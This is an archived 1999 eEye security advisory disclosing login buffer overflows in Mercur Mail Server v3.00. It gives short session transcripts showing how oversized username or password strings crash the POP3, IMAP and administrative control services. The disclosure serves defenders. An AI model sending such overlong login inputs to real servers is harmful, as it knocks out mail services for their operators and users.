eeye.99-02-21.mercur_mail
cd8416601a7bdc853e7df178e5ecbaaa8c8cf226455e3b7d68a01231a69446f2
[INLINE] [INLINE]
[INLINE] eEyelogosmall
Home Hire News Alerts Articles Books Tools Links Contact Press
[INLINE] [INLINE] [INLINE]
eEye - Digital Security Team Alert
Multiple Vulnerabilites in Mercur Mail Server
Systems Affected
Mercur v3.00
Release Date
February 21, 1999
Advisory Code
AD02211999
Description:
There are multiple places in Mercur where they do not use proper bounds checking. The following all
result in a Denial of Service against the service in question.
The pop3 (110) service has an overflow in the login function.
+OK MERCUR POP3-Server (v3.00.24 Unregistered) for Windows NT ready at Sun,
21 Feb 1999 22:05:28 -0800
user touchmyspecialspot
+OK <touchmyspecialspot>
pass glob
Where glob is 2400 characters. It could work with less or more.
The imapd (143) service has an overflow in the login process as well.
OK MERCUR IMAP4-Server (v3.00.26 Unregistered) for Windows NT ready at
Sun, 21 Feb 1999 22:12:30 -0800
x login glob1 glob2
Where glob1 is 300 characters and glob2 is 400 characters. Once again diffrent lengths will work.
The Administrative Control service (32000) also has a login overflow.
MERCUR Control-Service (v3.00.21 Unregistered) for Windows NT ready at Sun,
21 Feb 1999 22:16:54 -0800
Username: blah
Password: glob
Where glob is 900 characters. Once again size may vary.
Vendor Status
Vendor was contacted a week ago, Waiting for a response :-(
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert electronically. It is not to be
edited in any way without express consent of eEye. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer:
The information within this paper may change without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever arising out of or in connection
with the use or spread of this information. Any use of this information is at the user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
[INLINE]
[LINK]
[INLINE]
Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an www.eCompany.com Venture.